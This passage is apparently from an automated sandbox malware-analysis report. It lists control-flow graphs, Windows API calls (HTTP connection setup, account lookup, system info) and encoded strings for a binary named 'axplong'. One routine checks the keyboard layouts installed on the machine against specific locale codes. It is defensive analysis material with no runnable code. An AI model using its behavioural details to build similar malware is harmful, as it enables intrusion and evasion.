                        control_flow_graph 1141 be65b0-be6609 1215 be660a call 4f80828 1141->1215 1216 be660a call 4f807d8 1141->1216 1217 be660a call 4f80768 1141->1217 1218 be660a call 4f80819 1141->1218 1219 be660a call 4f80759 1141->1219 1220 be660a call 4f807aa 1141->1220 1221 be660a call 4f80841 1141->1221 1222 be660a call 4f80771 1141->1222 1223 be660a call 4f80795 1141->1223 1142 be660f-be6688 LookupAccountNameA call bf7870 call be5b20 1148 be668c-be66ab call be2280 1142->1148 1149 be668a 1142->1149 1152 be66dc-be66e2 1148->1152 1153 be66ad-be66bc 1148->1153 1149->1148 1154 be66e5-be66ea 1152->1154 1155 be66be-be66cc 1153->1155 1156 be66d2-be66d9 call bfd593 1153->1156 1154->1154 1159 be66ec-be6714 call bf7870 call be5b20 1154->1159 1155->1156 1157 be6907 call c16b9a 1155->1157 1156->1152 1164 be690c call c16b9a 1157->1164 1169 be6718-be6739 call be2280 1159->1169 1170 be6716 1159->1170 1168 be6911-be6916 call c16b9a 1164->1168 1175 be676a-be677e 1169->1175 1176 be673b-be674a 1169->1176 1170->1169 1182 be6828-be684c 1175->1182 1183 be6784-be678a 1175->1183 1177 be674c-be675a 1176->1177 1178 be6760-be6767 call bfd593 1176->1178 1177->1164 1177->1178 1178->1175 1185 be6850-be6855 1182->1185 1184 be6790-be67bd call bf7870 call be5b20 1183->1184 1201 be67bf 1184->1201 1202 be67c1-be67e8 call be2280 1184->1202 1185->1185 1186 be6857-be68bc call bf7f30 * 2 1185->1186 1195 be68be-be68cd 1186->1195 1196 be68e9-be6906 call bfcf21 1186->1196 1198 be68df-be68e6 call bfd593 1195->1198 1199 be68cf-be68dd 1195->1199 1198->1196 1199->1168 1199->1198 1201->1202 1208 be67ea-be67f9 1202->1208 1209 be6819-be681c 1202->1209 1210 be680f-be6816 call bfd593 1208->1210 1211 be67fb-be6809 1208->1211 1209->1184 1212 be6822 1209->1212 1210->1209 1211->1157 1211->1210 1212->1182 1215->1142 1216->1142 1217->1142 1218->1142 1219->1142 1220->1142 1221->1142 1222->1142 1223->1142
                        APIs
                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00BE6650
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: AccountLookupName
                        • String ID: GVQsgL==$IVKsgL==$RBPleCSm
                        • API String ID: 1484870144-3856690409
                        • Opcode ID: ac855dfd442558028c9b22178a8618797e427e9d1102a7a5a55801f458329e73
                        • Instruction ID: 598d1f13babc3d2ce79c34510cdddaab3d221e7e85d21fc78ba95a76c95d4145
                        • Opcode Fuzzy Hash: ac855dfd442558028c9b22178a8618797e427e9d1102a7a5a55801f458329e73
                        • Instruction Fuzzy Hash: 8D919FB190015C9BDB28DF24CC85BEDB7B9EB49304F4045E9E60997282DB709FC98FA4
                        APIs
                          • Part of subcall function 00BF7870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00BF795C
                          • Part of subcall function 00BF7870: __Cnd_destroy_in_situ.LIBCPMT ref: 00BF7968
                          • Part of subcall function 00BF7870: __Mtx_destroy_in_situ.LIBCPMT ref: 00BF7971
                          • Part of subcall function 00BEBD60: InternetOpenW.WININET(00C38D70,00000000,00000000,00000000,00000000), ref: 00BEBDED
                          • Part of subcall function 00BEBD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00BEBE11
                          • Part of subcall function 00BEBD60: HttpOpenRequestA.WININET(?,00000000), ref: 00BEBE5B
                        • std::_Xinvalid_argument.LIBCPMT ref: 00BF4EA2
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                        • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range
                        • API String ID: 2414744145-1662704651
                        • Opcode ID: d7282eb4dcbe4ed427e1357c2a471b598fa6b2de341e7b44e3604a8d7cbc6b95
                        • Instruction ID: 216392243834d0865a0b55976385dc1f6d1d13d25d0467353348033bd0e2c434
                        • Opcode Fuzzy Hash: d7282eb4dcbe4ed427e1357c2a471b598fa6b2de341e7b44e3604a8d7cbc6b95
                        • Instruction Fuzzy Hash: BC232871D0015C8BEB19DB28CD897ADBBB6AF85304F5081D8E509A72D2EB359F88CF51

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 915 be5df0-be5eee 921 be5f18-be5f25 call bfcf21 915->921 922 be5ef0-be5efc 915->922 924 be5f0e-be5f15 call bfd593 922->924 925 be5efe-be5f0c 922->925 924->921 925->924 926 be5f26-be60ad call c16b9a call bfe080 call bf7f30 * 5 RegOpenKeyExA 925->926 944 be6478-be6481 926->944 945 be60b3-be6143 call c14020 926->945 947 be64ae-be64b7 944->947 948 be6483-be648e 944->948 974 be6149-be614d 945->974 975 be6466-be6472 945->975 951 be64b9-be64c4 947->951 952 be64e4-be64ed 947->952 949 be64a4-be64ab call bfd593 948->949 950 be6490-be649e 948->950 949->947 950->949 954 be659e-be65a3 call c16b9a 950->954 956 be64da-be64e1 call bfd593 951->956 957 be64c6-be64d4 951->957 958 be64ef-be64fa 952->958 959 be651a-be6523 952->959 956->952 957->954 957->956 966 be64fc-be650a 958->966 967 be6510-be6517 call bfd593 958->967 961 be654c-be6555 959->961 962 be6525-be6530 959->962 971 be6557-be6566 961->971 972 be6582-be659d call bfcf21 961->972 969 be6542-be6549 call bfd593 962->969 970 be6532-be6540 962->970 966->954 966->967 967->959 969->961 970->954 970->969 978 be6578-be657f call bfd593 971->978 979 be6568-be6576 971->979 980 be6153-be6187 RegEnumValueW 974->980 981 be6460 974->981 975->944 978->972 979->954 979->978 986 be644d-be6454 980->986 987 be618d-be61ad 980->987 981->975 986->980 990 be645a 986->990 992 be61b0-be61b9 987->992 990->981 992->992 993 be61bb-be624d call bf7c50 call bf8090 call bf7870 * 2 call be5c60 992->993 993->986
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                        • API String ID: 0-3963862150
                        • Opcode ID: 638bab5f88304f59a7ce805c057702581b3fcb4488b4d6374fcabaa12440dd8b
                        • Instruction ID: 9a5ffda1d641e15632447c35c30557eb7f5e7170a21d2b7601101a199b132f2a
                        • Opcode Fuzzy Hash: 638bab5f88304f59a7ce805c057702581b3fcb4488b4d6374fcabaa12440dd8b
                        • Instruction Fuzzy Hash: 0BE17F7190025CABEB24DFA4CC89BEDB7B9EF14304F5042D9E509A7291DB74ABC88F51

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1003 be7d00-be7d82 call c14020 1007 be827e-be829b call bfcf21 1003->1007 1008 be7d88-be7db0 call bf7870 call be5b20 1003->1008 1015 be7db4-be7dd6 call bf7870 call be5b20 1008->1015 1016 be7db2 1008->1016 1021 be7dda-be7df3 1015->1021 1022 be7dd8 1015->1022 1016->1015 1025 be7e24-be7e4f 1021->1025 1026 be7df5-be7e04 1021->1026 1022->1021 1027 be7e80-be7ea1 1025->1027 1028 be7e51-be7e60 1025->1028 1029 be7e1a-be7e21 call bfd593 1026->1029 1030 be7e06-be7e14 1026->1030 1033 be7ea7-be7eac 1027->1033 1034 be7ea3-be7ea5 GetNativeSystemInfo 1027->1034 1031 be7e76-be7e7d call bfd593 1028->1031 1032 be7e62-be7e70 1028->1032 1029->1025 1030->1029 1035 be829c call c16b9a 1030->1035 1031->1027 1032->1031 1032->1035 1038 be7ead-be7eb6 1033->1038 1034->1038 1045 be82a1-be82a6 call c16b9a 1035->1045 1043 be7eb8-be7ebf 1038->1043 1044 be7ed4-be7ed7 1038->1044 1047 be8279 1043->1047 1048 be7ec5-be7ecf 1043->1048 1049 be821f-be8222 1044->1049 1050 be7edd-be7ee6 1044->1050 1047->1007 1053 be8274 1048->1053 1049->1047 1051 be8224-be822d 1049->1051 1054 be7ee8-be7ef4 1050->1054 1055 be7ef9-be7efc 1050->1055 1056 be822f-be8233 1051->1056 1057 be8254-be8257 1051->1057 1053->1047 1054->1053 1058 be81fc-be81fe 1055->1058 1059 be7f02-be7f09 1055->1059 1060 be8248-be8252 1056->1060 1061 be8235-be823a 1056->1061 1064 be8259-be8263 1057->1064 1065 be8265-be8271 1057->1065 1066 be820c-be820f 1058->1066 1067 be8200-be820a 1058->1067 1062 be7f0f-be7f6b call bf7870 call be5b20 call bf7870 call be5b20 call be5c60 1059->1062 1063 be7fe9-be81e5 call bf7870 call be5b20 call bf7870 call be5b20 call be5c60 call bf7870 call be5b20 call be5640 call bf7870 call be5b20 call bf7870 call be5b20 call be5c60 call bf7870 call be5b20 call be5640 call bf7870 call be5b20 call bf7870 call be5b20 call be5c60 call bf7870 call be5b20 call be5640 1059->1063 1060->1047 1061->1060 1068 be823c-be8246 1061->1068 1089 be7f70-be7f77 1062->1089 1103 be81eb-be81f4 1063->1103 1064->1047 1065->1053 1066->1047 1071 be8211-be821d 1066->1071 1067->1053 1068->1047 1071->1053 1091 be7f7b-be7f9b call c18a81 1089->1091 1092 be7f79 1089->1092 1097 be7f9d-be7fac 1091->1097 1098 be7fd2-be7fd4 1091->1098 1092->1091 1100 be7fae-be7fbc 1097->1100 1101 be7fc2-be7fcf call bfd593 1097->1101 1102 be7fda-be7fe4 1098->1102 1098->1103 1100->1045 1100->1101 1101->1098 1102->1103 1103->1049 1107 be81f6 1103->1107 1107->1058
                        APIs
                        • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BE7EA3
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoNativeSystem
                        • String ID: JmpxQb==$JmpxRL==$JmpyPb==
                        • API String ID: 1721193555-2057465332
                        • Opcode ID: 0f8ac088b58f50d81c2f708f25c42ab5f5dbbfcaa659e9ba2f7ec51f75bb67c9
                        • Instruction ID: 6c1cfa9b6c80050ead769827d89d39bed34a2294087572161aac91196cd0402a
                        • Opcode Fuzzy Hash: 0f8ac088b58f50d81c2f708f25c42ab5f5dbbfcaa659e9ba2f7ec51f75bb67c9
                        • Instruction Fuzzy Hash: 81D1E770E00688ABDF24AF29CC477AD77A1AB46314F9442D8E415A73D2DF354E858BD2

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1224 c16e01-c16e36 GetFileType 1225 c16e3c-c16e47 1224->1225 1226 c16eee-c16ef1 1224->1226 1229 c16e69-c16e85 call c14020 GetFileInformationByHandle 1225->1229 1230 c16e49-c16e5a call c17177 1225->1230 1227 c16ef3-c16ef6 1226->1227 1228 c16f1a-c16f42 1226->1228 1227->1228 1232 c16ef8-c16efa 1227->1232 1234 c16f44-c16f57 1228->1234 1235 c16f5f-c16f61 1228->1235 1238 c16f0b-c16f18 call c1740d 1229->1238 1246 c16e8b-c16ecd call c170c9 call c16f71 * 3 1229->1246 1242 c16e60-c16e67 1230->1242 1243 c16f07-c16f09 1230->1243 1232->1238 1239 c16efc-c16f01 call c17443 1232->1239 1234->1235 1247 c16f59-c16f5c 1234->1247 1237 c16f62-c16f70 call bfcf21 1235->1237 1238->1243 1239->1243 1242->1229 1243->1237 1260 c16ed2-c16eea call c17096 1246->1260 1247->1235 1260->1235 1263 c16eec 1260->1263 1263->1243
                        APIs
                        • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00C16E23
                        • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00C16E7D
                        • __dosmaperr.LIBCMT ref: 00C16F12
                          • Part of subcall function 00C17177: __dosmaperr.LIBCMT ref: 00C171AC
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: File__dosmaperr$HandleInformationType
                        • String ID:
                        • API String ID: 2531987475-0
                        • Opcode ID: 8f52c76facf621baa4f5ecb85f50e883538964a7ff2ff7c8df448c82ecf02cd5
                        • Instruction ID: 14dabc025ffb7dd58d0b6de54ff3cc26f6d42eb875cac447b17997a35c595feb
                        • Opcode Fuzzy Hash: 8f52c76facf621baa4f5ecb85f50e883538964a7ff2ff7c8df448c82ecf02cd5
                        • Instruction Fuzzy Hash: 9C412D75900204AADB24DFB5EC41AEFBBF9EF4A300B10452DF956D3610DA31A985EB61

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1302 c1d4f4-c1d515 call bfdeb0 1305 c1d517 1302->1305 1306 c1d52f-c1d532 1302->1306 1307 c1d519-c1d51f 1305->1307 1308 c1d54e-c1d55a call c1a688 1305->1308 1306->1308 1309 c1d534-c1d537 1306->1309 1310 c1d543-c1d54c call c1d43c 1307->1310 1313 c1d521-c1d525 1307->1313 1320 c1d564-c1d570 call c1d47e 1308->1320 1321 c1d55c-c1d55f 1308->1321 1309->1310 1311 c1d539-c1d53c 1309->1311 1324 c1d58c-c1d595 1310->1324 1314 c1d572-c1d582 call c17443 call c16b8a 1311->1314 1315 c1d53e-c1d541 1311->1315 1313->1308 1318 c1d527-c1d52b 1313->1318 1314->1321 1315->1310 1315->1314 1318->1314 1323 c1d52d 1318->1323 1320->1314 1336 c1d584-c1d589 1320->1336 1325 c1d6cb-c1d6da 1321->1325 1323->1310 1328 c1d5a2-c1d5b3 1324->1328 1329 c1d597-c1d59f call c18c8b 1324->1329 1334 c1d5b5-c1d5c7 1328->1334 1335 c1d5c9 1328->1335 1329->1328 1338 c1d5cb-c1d5dc 1334->1338 1335->1338 1336->1324 1339 c1d64a-c1d65a call c1d687 1338->1339 1340 c1d5de-c1d5e0 1338->1340 1351 c1d6c9 1339->1351 1352 c1d65c-c1d65e 1339->1352 1342 c1d5e6-c1d5e8 1340->1342 1343 c1d6db-c1d6dd 1340->1343 1347 c1d5f4-c1d600 1342->1347 1348 c1d5ea-c1d5ed 1342->1348 1344 c1d6e7-c1d6fa call c1651d 1343->1344 1345 c1d6df-c1d6e6 call c18cd3 1343->1345 1369 c1d708-c1d70e 1344->1369 1370 c1d6fc-c1d706 1344->1370 1345->1344 1354 c1d640-c1d648 1347->1354 1355 c1d602-c1d617 call c1d4eb * 2 1347->1355 1348->1347 1353 c1d5ef-c1d5f2 1348->1353 1351->1325 1359 c1d660-c1d676 call c1a531 1352->1359 1360 c1d699-c1d6a2 1352->1360 1353->1347 1361 c1d61a-c1d61c 1353->1361 1354->1339 1355->1361 1379 c1d6a5-c1d6a8 1359->1379 1360->1379 1361->1354 1363 c1d61e-c1d62e 1361->1363 1368 c1d630-c1d635 1363->1368 1368->1339 1373 c1d637-c1d63e 1368->1373 1375 c1d710-c1d711 1369->1375 1376 c1d727-c1d738 RtlAllocateHeap 1369->1376 1370->1369 1374 c1d73c-c1d747 call c17443 1370->1374 1373->1368 1386 c1d749-c1d74b 1374->1386 1375->1376 1380 c1d713-c1d71a call c19c81 1376->1380 1381 c1d73a 1376->1381 1383 c1d6b4-c1d6bc 1379->1383 1384 c1d6aa-c1d6ad 1379->1384 1380->1374 1391 c1d71c-c1d725 call c18cf9 1380->1391 1381->1386 1383->1351 1389 c1d6be-c1d6c6 call c1a531 1383->1389 1384->1383 1388 c1d6af-c1d6b2 1384->1388 1388->1351 1388->1383 1389->1351 1391->1374 1391->1376
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eb74a7677724ec30d5a713b3c1e11016876d68ccadf7a3e6e5a5281106946e67
                        • Instruction ID: 46dfabb3239a25c93f9dac22575d624b1a9391447f714b6658200da112f056d9
                        • Opcode Fuzzy Hash: eb74a7677724ec30d5a713b3c1e11016876d68ccadf7a3e6e5a5281106946e67
                        • Instruction Fuzzy Hash: 03611572D002148FDF25EFA8D8857EDB7B2AB47315F248516E46BA7290D7309EC0BB91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1396 be82b0-be8331 call c14020 1400 be833d-be8365 call bf7870 call be5b20 1396->1400 1401 be8333-be8338 1396->1401 1409 be8369-be838b call bf7870 call be5b20 1400->1409 1410 be8367 1400->1410 1402 be847f-be849b call bfcf21 1401->1402 1415 be838f-be83a8 1409->1415 1416 be838d 1409->1416 1410->1409 1419 be83aa-be83b9 1415->1419 1420 be83d9-be8404 1415->1420 1416->1415 1421 be83cf-be83d6 call bfd593 1419->1421 1422 be83bb-be83c9 1419->1422 1423 be8406-be8415 1420->1423 1424 be8431-be8452 1420->1424 1421->1420 1422->1421 1425 be849c-be84a1 call c16b9a 1422->1425 1427 be8427-be842e call bfd593 1423->1427 1428 be8417-be8425 1423->1428 1429 be8458-be845d 1424->1429 1430 be8454-be8456 GetNativeSystemInfo 1424->1430 1427->1424 1428->1425 1428->1427 1434 be845e-be8465 1429->1434 1430->1434 1434->1402 1436 be8467-be846f 1434->1436 1439 be8478-be847b 1436->1439 1440 be8471-be8476 1436->1440 1439->1402 1441 be847d 1439->1441 1440->1402 1441->1402
                        APIs
                        • GetNativeSystemInfo.KERNELBASE(?), ref: 00BE8454
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoNativeSystem
                        • String ID:
                        • API String ID: 1721193555-0
                        • Opcode ID: 74981a6769627491c5d585573d3268102fd580cf6664b10b834a07937be72df2
                        • Instruction ID: b2a3b5324265762efb6529d14673ec036b4ffa12bb14f78f34cdbbcc05d591e1
                        • Opcode Fuzzy Hash: 74981a6769627491c5d585573d3268102fd580cf6664b10b834a07937be72df2
                        • Instruction Fuzzy Hash: 3D514871D006489BEB24EF29CD85BEDB7B5EB45304F5042E8E808A73C1EF355A808B91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1442 c16c99-c16ca5 1443 c16cc4-c16ce8 call c14020 1442->1443 1444 c16ca7-c16cc3 call c17430 call c17443 call c16b8a 1442->1444 1449 c16d06-c16d28 CreateFileW 1443->1449 1450 c16cea-c16d04 call c17430 call c17443 call c16b8a 1443->1450 1453 c16d38-c16d3f call c16d77 1449->1453 1454 c16d2a-c16d2e call c16e01 1449->1454 1474 c16d72-c16d76 1450->1474 1464 c16d40-c16d42 1453->1464 1461 c16d33-c16d36 1454->1461 1461->1464 1466 c16d64-c16d67 1464->1466 1467 c16d44-c16d61 call c14020 1464->1467 1470 c16d70 1466->1470 1471 c16d69-c16d6f 1466->1471 1467->1466 1470->1474 1471->1470
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
